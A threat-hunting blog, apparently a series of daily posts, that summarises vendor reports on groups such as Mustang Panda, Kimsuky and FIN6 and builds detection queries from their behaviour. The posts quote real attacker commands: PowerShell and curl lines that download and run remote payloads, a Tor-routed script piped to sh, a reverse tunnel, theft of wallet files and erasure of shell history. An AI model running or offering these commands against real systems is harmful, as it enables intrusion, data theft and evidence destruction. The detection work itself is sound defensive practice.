Know Your Adversary

Hello everyone! As I noted yesterday, more and more threat actors add DLL side-loading to their arsenals. Let's at one using it for quite a long time - Mustang Panda (or Horned Werewolf as we track it). According to this report , the adversary distributed phishing emails with Google Drive links to ZIP or RAR archives. This archives contain masquaraded legitimate executables (for example, 9th WPCT Region-Wise Action Plans on Tibet.exe) and malicious Claimloader DLLs.  The threat actors abused the following legitimate executables: Adobe Licensing WF Helper ( adobe_licensing_wf_helper.exe ), Wargaming.net Game Center ( helper_process.exe ) and FFWallpaper Widgets Jyy ( fhbjyy.exe ). Of course, you already know what to do: event_type: "processcreatewin" AND ((proc_file_originalfilename: "adobe_licensing_wf_helper.exe" AND NOT proc_file_name: "adobe_licensing_wf_helper.exe") OR (proc_file_originalfilename: "helper_process.exe" AND NOT proc_file...

Hello everyone! Even cybercrime actors evolve their techniques and adding DLL side-loading to the arsenal. Recently I spotted Snake Keylogger distributors abuse jsadebugd.exe to sideload a malicious DLL. This case is covered publicly in this report by Lab52. If we look at VirusTotal, for example, we can see that this legitimate executable was uploaded there with lots of interesting filenames : It means it's widely abused by threat actors, and it's a good idea to search for renamed executables: event_type: "processcreatewin" AND proc_file_originalfilename: "jsadebugd.exe" AND NOT proc_file_name: "jsadebugd.exe" See you tomorrow!

Hello everyone! Today we'll talk about a framework, which is quite popular among Chinese-speaking threat actors. It's called Ladon and can be used by adversary to solve various tasks: scanning, exploitation, remote execution, etc. It's used in-the-wild. Here're some procedure examples as seen in this report : powershell -exec bypass Import-Module .\Ladon.ps1;Ladon SweetPotato whoami powershell -ExecutionPolicy Bypass Import-Module .\Ladon.ps1;Ladon MssqlCmd [IP] [User] [Password] master xp_cmdshell “net user” So, if a threat actor uses it on a compromised system, you see LOTS of interesting command line arguments, and we can use it for detection and hunting: event_type: ("processcreatewin" OR "processcreatemac" OR "processcreatenix") AND cmdline: ("ladon" OR "ms17010" OR "bypassedr" OR "whatcms" OR "draytekpoc" OR "debase64" OR "smbghost" OR "enummssql" OR ...

Hello everyone! Tunnelers are everywhere! And this one becoming more and more popular among threat actors. Revsocks . Let's look at how this tool is abused in-the-wild. Here's an example . The adversary abused PowerShell to create a shortcut in the Startup folder and execute revsocks: powershell -Command "$s = (New-Object -COM WScript.Shell).CreateShortcut('C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\m4.lnk'); $s.TargetPath = 'C:\Users\user\AppData\Local\Microsoft\Windows\m4.exe'; $s.Arguments = '-connect hxxps://metallurgify[.]com:16443 -tls -pass 1488 -ws'; $s.WorkingDirectory = 'C:\Users\user\AppData\Local\Microsoft\Windows'; $s.Save();" So, the first hunting idea is to search for creating shortcuts with PowerShell: event_type: "processcreatewin" AND proc_file_name: "powershell.exe" AND cmdline: "createshortcut" Another one - hunting for revsocks-related command line argum...

Hello everyone! Let's look at another example of leveraging ClickFix technique. This time it's SideCopy - a sub-cluster of Transparent Tribe. Recently Recorded Future reported on a new version of DRAT - let's look at some detection and hunting opportunities. First of all, the adversary abuses mshta.exe : C:\Windows\System32\mshta.exe hxxps://trade4wealth[.]in/admin/assets/css/default/index.php It's a great candidate for hunting! For example, we can search for mshta.exe executing files from remote servers: event_type: "processcreatewin" AND proc_file_name: "mshta.exe" AND cmdline: ("http" OR "https") Next - it abuses reg.exe to establishes persistence for DRAT: REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Edgre" /t REG_SZ /F /D "cmd /C start C:\Users\Public\USOShared-1de48789-1285\zuidrt.pdf Here we can hunt for adding files located under %PUBLIC% to the Run key, for example: event_typ...

Hello everyone! Adversaries always experiment with services thay use for malware delivery. This time CyberArmor spotted threat actors abused Vercel to host a malicious page. Vercel provides developer tools, frameworks, and cloud infrastructure to build and maintain websites. The adversary used it to deliver  LogMeIn - another commonly abused legitimate remote access software. So, we can hunt for accessing Vercel infrastructure from uncommon hosts: event_type: "dnsreqwin" AND dns_rname: "vercel.app" Also, you can hunt for LogMeIn with uncommon file names and locations: event_type: "processcreatewin" AND proc_file_productname: "GoTo Resolve" See you tomorrow!

Hello everyone! Malware installation routines are noisy. Most of the time. What does it mean? We can transform this noise into detection and hunting ideas! Let's look at Koi Loader . It's commonly delivered with help of malicious LNK-files, like this one . So, it executes the following command: powershell.exe -command $q7hl1gh07lmh4rm = 'ws'+'cr'+'ip' + 't ' + '%ProgramData%\' + ('nblxsl7b2fdze5.js wg3c86ft8'); & ('cu'+'r'+'l.ex'+'e') -sL -o nblxsl7b2fdze5.js 'hXXps://ayeorganization[.]com/wp-content/uploads/2019/04/goosehouseel.php'; & ('cur'+'l.e'+'xe') -s -o e8p1xhlnt1xd -L 'hXXps://ayeorganization[.]com/wp-content/uploads/2019/04/pseudophilanthropicalgjxR.php'; mv e8p1xhlnt1xd wg3c86ft8.js; . ('sc'+'hta' + 'sks') /create /sc minute /f /mo 1 /tr $q7hl1gh07lmh4rm /tn wg3c86ft8; As you can see, here we can see lots of detection...

Hello everyone! We already talked about cases, where adversaries abused Python to execute various scripts. But this time, according to Knownsec report , the Confucius group used it for sideloading. The adversary leveraged malicious LNK files (yes, again and again) to download a bunch of files to the compromised system. These files included python313.dll (a backdoor researchers called Anondoor ) and BlueAle.exe - a renamed copy of pythonw.exe . And yes, this is another case we can hunt for suspicious renamed legitimate executables: event_type: "processcreatewin" AND proc_file_originalfilename: "pythonw.exe" AND NOT proc_file_name: "pythonw.exe" Make sure to check the report for more detection ideas! See you tomorrow!

Hello everyone! We are talking a lot about Windows threats, but let's look at Linux and containers today as these are common targets of those involved in cryptominers distribution. According to this report by Trend Micro, the threat actors abused a Docker remote API server to create a new container. The following base64-encoded command was executed: apk update && apk add curl tor && tor & while ! curl -fs --proxy socks5h://localhost:9050 https://checkip [.]amazonaws.com; do sleep 10; done; curl -fs --proxy socks5h://localhost:9050 http[:]//wtxqf54djhp5pskv2lfyduub5ievxbyvlzjgjopk6hxge5umombr63ad[.]onion/static/docker-init.sh | sh Despite the fact it was executed in the adversary-created container, it's good to relevant detections. For example, abusing apk to set up Tor: event_type: "processcreatenix" AND proc_file_name: "apk" AND cmdline: "add" AND "tor" One more thing - using cURL over Tor: event_type: "processc...

Hello everyone! I think already everybody knows about ClickFix technique, but we still see new and new variations, especially if we are talking about a command a victim should paste. Proofpoint has published a report on Amatera Stealer , and the adversary leveraged ClickFix technique to deliver it. The victim should paste the following command into the Windows Run dialog: powershell -w h -c "$p=$env: TEMP+'\t.csproj';irm https://cv[.]cbrw[.]ru/t.csproj -0 $p;&($env: SystemRoot+'\Microsoft.NET\Framework\v4.0.30319\msbuild.exe') $p" The threat actors abuse PowerShell to download a malicious C# project file from a remote server, save it to the temporary directory, and executes it using msbuild.exe . So, as always, we can use suspicious command line arguments for detection, for example: event_type: "processcreatewin" AND proc_file_name: "powershell.exe" AND cmdline: (*msbuild* AND *csproj*) See you tomorrow!

Hello everyone! Huntress has shared the results of analysis of a recent BlueNoroff attack involving a macOS device, a fake Zoom extension and even deepfakes! So, let's look at some detection opportunities! Let's look at indicator removal techniques. The adversary abused environment variable HISTFILE: unset HISTFILE We can definitely use it for detection: event_type: "processcreatemac" AND cmdline: "unset histfile" Next behavior - removing shell history: history -p > /dev/null This can also be used for detection: event_type: "processcreatemac" AND proc_file_name: "history" AND cmdline: "dev//null" Finally, the threat actors remove shell history files: rm -rf ~/.zsh_history rm -rf ~/.bash_history rm -rf ~/.zsh_sessions And yes, this is another detection opportunity: event_type: "processcreatemac" AND proc_file_name: "rm" AND cmdline: (" zsh_history " OR " bash_history " OR " zsh_ses...

Hello everyone! Red Canary has colored another bird . This time the cluster is called  Mocha Manakin . The adversary leverages ClickFix technique to deliver NodeJS-based backdoor named NodeInitRAT . Researchers note that ths activity has overlaps with  Interlock ransomware, so it's important to detect this as early as possible. They already shared a few detection opportunities you can use, but I also suggest hunting for suspicious events related to PowerShell spawning node.exe : event_type: "processcreatewin" AND proc_p_file_path: "powershell.exe" AND proc_file_path: "node.exe" See you tomorrow!

Hello everyone! We can get threat hunting and detection ideas not only from advanced threats, but also from commodity malware. Let's look at KimJongRAT infection chain described by Unit42. Here we're dealing with malicious LNK-files ome more time. The file executes the following command: "C:\Windows\System32\cmd.exe" /c cd /d C:\Users\<USER>\AppData\Local\Temp && curl -O https://cdn[.]glitch[.]global/2eefa6a0-44ff-4979-9a9c-689be652996d/sfmw.hta?v=2 && mshta C:\Users\<USER>\AppData\Local\Temp\sfmw.hta Once again we see cURL abused to download a malicious file, this time an HTA, and mshta.exe to execute it. So, the first hunting idea is to look for cURL downloading HTA files: event_type: "processcreatewin" AND proc_file_name: "curl.exe" AND cmdline: "hta" Next thing - mshta.exe and suspicious folders: event_type: "processcreatewin" AND proc_file_name: "mshta.exe" AND cmdline: "local\...

Hello everyone! I'm sure you already use LLMs to solve various security-related tasks. So do adversaries! For example, let's look at a campaign uncovered by Qianxin Threat Intelligence Center. The threat actors used Telegram to distribute archives with malicious LNK-files. These files abused cURL to download a malicious .vbs file from a remote server, for example: C:\Windows\System32\cmd.exe /c "curl -o C:\Users\Public\aa.vbs https://zl-web-images[.]oss-cn-shenzhen[.]aliyuncs[.]com/5C25D918A2314DA2AC8D3C704287E278.vbs && start C:\Users\Public\aa.vbs" Here we have a nice hunting opportunity: event_type: "processcreatewin" AND proc_file_name: "curl.exe" AND cmdline: "vbs" So, if we look inside the .vbs file, we can see that it's very similar to those created with LLMs! That's it! See you tomorrow!

Hello everyone! Trend Micro has uncovered a new threat actor dubbed  Water Curse . The adversary uses weaponized GitHub repositories to deliver multistage malware. Researchers already identified at least 76 GitHub accounts related to this campaign. So, the project files contain a snippet of malicious batch file code inside of the <PreBuildEvent> tag, which would be triggered while the code is compiling.  MSBuild.exe spawns cmd.exe , which drops a malicious .vbs file, for example,  C:\Users\[redacted]\AppData\Local\Temp\ohQ13W\XHa0aaUw9.vbs . And yes, we can use this behavior for hunting: event_type: "filecreatewin" AND proc_p_file_path: "msbuild.exe" AND proc_file_path: "cmd.exe" AND file_path: "vbs" See you tomorrow!

Hello everyone! You can get detection and hunting ideas not only from threat actors' behaviors, but also from security researchers! For example, Adam shared an interesting case of Windows Problem Reporting abuse. This executable has many command line arguments, and -boot one allows to load the following DLL:  C:\Windows\System32\offdmpsvc.dll . It's not available by default, so an adversary can use it to write a payload there. It means we can use this argument for detection: event_type: "processcreatewin" AND proc_file_name: "wermgr.exe" AND cmdline: "boot" See you tomorrow!

Hello everyone! Let's look at another curious example of  System Binary Proxy Execution (T1218) technique. DomainTools reported on FIN6 (Skeleton Spider) campaign, which included phishing with fake resumes. The adversary distributed archives with malicious LNK-files. The file executed an obfuscated command, for example: %ComSpec%" /v /c (for %l in (s) do @set "Alter=%~l") && !Alter!et "Trick=ure = " && !Alter!et "Drawings=-base" && !Alter!et "Person=version" && !Alter!et "Twist=." && !Alter!et "Involves=$win" && !Alter!et "Genius=si" && !Alter!et "Streams=d" && !Alter!et "Grass=t" && !Alter!et "Builders=c" && !Alter!et "Armor=settings" && !Alter!et "Disorder=e" && !Alter!et "Womens=ni" && !Alter!et "Cloth=a" && !Alter!et ...

Hello everyone! Threat actors are always adding new tools to their arsenal. This Symantec report on Fog Ransomware proves it one more time.  Among other uncommon tools, the adversary leveraged Syteca - a legitimate security solution, which enables recording on-screen activity, keystroke monitoring, etc. The threat actors even used  PsExec and SMBExec to execute the tool on the remote systems, for example: cmd.exe /Q /c SytecaClient.exe 1> \\127.0.0.1\ADMIN$\__1748095766.8385904 2>&1 As it's a legitimate tool, it's quite easy to detect, for example: event_type: "processcreatewin" AND proc_file_productname: "syteca" See you tomorrow!

Hello everyone! Reading Check Point's report on Stealth Falcon activities, I spotted an interesting way of abusing iediagcmd.exe . The adversary uses malicious  .url files. The URL parameter points to iediagcmd.exe . Normally this executable spawns additional processes to collect diagnostic data, including route.exe . The working folder is changed by the .url to the attacker-controlled WebDAV server, so iediagcmd.exe runs the route.exe from \\summerartcamp[.]net@ssl@443/DavWWWRoot\OSYxaOjr\route.exe  (Horus Loader) instead of a legitimate one in system32 folder. Of course, we can use it for detection, and search for  iediagcmd.exe executing files from WebDAV servers, for example: event_type: "processcreatewin" AND proc_p_file_path: "iediagcmd.exe" AND proc_file_path: "DavWWWRoot" See you tomorrow!

Hello everyone! Adversaries may have various motivations to conduct cyber attacks. But most of them are interested in getting some money. At least at some point! Kaspersky released a report on an activity cluster we track as Rare Werewolf (or Librarian Ghouls as they call it). You can find lots of curious things to detect and hunt in the report, but let's focus on collecting cryptocurrency wallet credentials and seed phrases: %SYSTEMDRIVE%\Intel\driver.exe a -r -[REDACTED] %SYSTEMDRIVE%\Intel\wallet.rar  C:\*парол*.* /y %SYSTEMDRIVE%\Intel\driver.exe a -r -[REDACTED] %SYSTEMDRIVE%\Intel\wallet.rar  C:\*карт*.* /y %SYSTEMDRIVE%\Intel\driver.exe a -r -[REDACTED] %SYSTEMDRIVE%\Intel\wallet.rar  C:\*кошельк*.* /y %SYSTEMDRIVE%\Intel\driver.exe a -r -[REDACTED] %SYSTEMDRIVE%\Intel\wallet.rar  C:\wallet.dat /y %SYSTEMDRIVE%\Intel\driver.exe a -r -[REDACTED] %SYSTEMDRIVE%\Intel\wallet.rar  C:\*wallet*.doc* /y %SYSTEMDRIVE%\Intel\driver.exe a -r -[REDACTED] %SYS...

Hello everyone! Let's look at a curious example of Protocol Tunneling technique (T1572) as seen in a recent report by SentinelOne. The adversary used a ShadowPad variant, which leveraged DNS over HTTPS (DoH) in an attempt to evade detection. In order to obscure DNS traffic, the threat actors Base-64 encoded queried domains, for example: https://8.8.8.8:443/dns-query?dns=AAABAAABAAAAAAAABG5ld3MKaW1hZ2luZXJqcANjb20AAAEAAQ So, if you have related telemetry - you know what to hunt for! See you tomorrow!

Hello everyone! The Genians Security Center (GSC) reported on a recent Kimsuky (we track this activity cluster as Monolithic Werewolf ) campaign, which took place in between March and April 2025. Interesting enough that the adversary leveraged multiple communication channels to distribute malicious files, including email, Facebook and Telegram. The installation process is quite noisy as always, so we have lots of detection opportunities. For example, the threat actors abused PowerShell and Certutil for decoding: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden certutil -decode C:\Windows\..\ProgramData\ffBqrQ6.rppn C:\Windows\..\ProgramData\sRPCU5y.evJl A good candidate for detection, right? event_type: "processcreatewin" AND proc_file_name: "powershell.exe" AND cmdline: ("certutil" AND "decode") One more thing - abusing reg.exe to achieve persistence: reg add HKCU\Software\Microsoft\Windows\CurrentVersio...

Hello everyone! Malware distribution through game cheats isn't a new phenomena, so it's important to be able to detect related activities. Let's look into fresh report by Unit42 on new Windows-based malware called Blitz . The malware author used social media to distribute Blitz through game cheat packages. The threat actor abused PowerShell to deliver Blitz downloader: powershell.exe -c \"$ProgressPreference = 'SilentlyContinue'; $p=\\\"$env: LOCALAPPDATA\\Microsoft\\Internet Explorer\\ieapfltr.dll\\\"; $hu='https://pastebin.com/ raw/FSzik5ew'; $du=(irm 'https://pastebin.com/raw/RzLEd17Z');if (Test-Path $p) {$eh=irm $hu;if($eh. Length -eq 64 -and $eh -match '^[a-fA-F0-9]{64}$'){$ah=(Get-FileHash $p -Algorithm SHA256).Hash;if ($eh -ne $ah) {iwr $du -OutFile $p}}}else{iwr $du -OutFile $p}\" Let's focus on Pastebin and iwr to build our hunting query: event_type: "processcreatewin" AND proc_file_name: "powe...

Hello everyone! Proofpoint in collaboration with Threatray released  a report on TA397 activities. Threat researchers assess that it's a state-sponsored adversary with focus on intelligence gathering. The threat actors actively abused task scheduler. A very common technique, but the command seemed interesting to me: "C:\\Windows\\System32\\conhost.exe" --headless cmd /c ping  localhost > nul & schtasks /create /tn "EdgeTaskUI" /f /sc  minute /mo 16 /tr "conhost --headless powershell -WindowStyle  Minimized irm "woodstocktutors[.]com/jbc.php? fv=$env:COMPUTERNAME*$env:USERNAME" -OutFile  "C:\\Users\\public\\kwe.cc"; Get-Content  "C:\\Users\\public\\kwe.cc" | cmd" Fisrt of all, the adversary extensively uses conhost.exe in "headless" mode, I'm sure you already have this hunt in your library: event_type: "processcreatewin" AND proc_file_name: "conhost.exe" AND cmdline: "headless...

Hello everyone! I have an addition to your hunting collection related to RMMs! Yes, I know. Yes, one more. That's life! So, Kaspersky shared a report on Cyber Partisans (we track this activity cluster as Guerrilla Hyena ). Among other malware and tools, the adversary leveraged an RMM called  Aspia Remote Desktop . It's interesting that this tool isn't listed on LOLRMM project, so it's a good idea to have a hunting query: event_type: "processcreatewin" AND proc_file_productname: "aspia" See you tomorrow!

Hello everyone! LOLBAS are everywhere! And we see more and more of them abused by real adversaries. For example, OpenSSH, which is included in newer versions of Windows! Xavier Mertens shared a curious example of how threat actors abuse it. The adversary executes ssh.exe with custom configuration file: C:\Windows\System32\OpenSSH\ssh.exe -F "C:\Windows\Temp\config" So, for example, we can hunt for ssh.exe executed with -F and config file located under Temp folder: event_type: "processcreatewin" AND proc_file_name: "ssh.exe" AND cmdline: ("f" AND "temp") See you tomorrow!

Hello everyone! I don't often see malicious browser extensions in-the-wild. So this report by Positive Technologies definitely deserves attention. Despite the fact abusing browser extensions isn't the most common technique, the report shows that installation process is extremely noisy. For example, the threat actors kill browser-related processes: var kalee = ["taskkill /F /IM chrome.exe", "taskkill /F /IM msedge.exe", "taskkill /F /IM brave.exe"]; Definitely worth a detector, right? event_type: "processcreatewin" AND proc_file_name: "taskkill.exe" AND cmdline: ("chrome" OR "msedge" OR "brave") Also, the threat actors collect information about the compromised system abusing ipinfo[.]io, for example: for /f "delims=" %%a in ('powershell -command "(Invoke-RestMethod https://ipinfo.io/json).ip"') do set "IP_PUBLICO=%%a" Yes, another legitimate service we can use f...

Hello everyone! Let's talk a bit about phishing. We always tell users to check the URL. And threat actors know it! That's why they always try to make it look as legitimate as possible. Cofense Phishing Defense Center shared information on a phishing campaign, in which threat actors abused Google Apps Script. Why? It helped to make phishing page to look legitimate as it was hosted on script[.]google[.]com. Seems like a good thing to hunt for? Why not! event_type: "dnsreq" AND dns_rname: "script.google.com" See you tomorrow!

Hello everyone! I'm sure you love forensics. I do! But threat actors... I dont think so. That's why they have various techniques in their arsenal to hinder forensic analysis and recovery! For example, CyberLock . The adversary abused cipher.exe to erase free space and harden forensic recovery: Start-Process cipher.exe -ArgumentList "/w:C:\" -WindowStyle Hidden Of course, hunting for ransomware isn't a good idea, but we can face this procedure in other cases as well. For example, to wipe free space after deleting the toolset. So it may also be a good candidate for a hunting query: event_type: "processcreatewin" AND proc_file_originalfilename: "cipher.exe" See you tomorrow!

Hello everyone! It's definitely not a secret that adversaries often abuse various command and scripting interpreters, such as Windows Command Shell and PowerShell. But in some cases they can bring their own tools to execute commands on the compromised system. For example, NirCmd . It's a small utility that allows threat actors to solve various tasks without displaying any user interface. Here's an example how Rare Werewolf abused this tool: schtasks /create /tn "AutoUpdate Driver" /tr "C:\Users\admin\Window\nircmd.exe exec hide C:\Users\admin\Window\bat2.bat" /sc hourly /st 00:00 /ru SYSTEM /f Definitely, this utility is worth a hunting query: event_type: "processcreatewin" AND proc_file_originalfilename: "nircmd.exe" AND cmdline: "hide" See you tomorrow!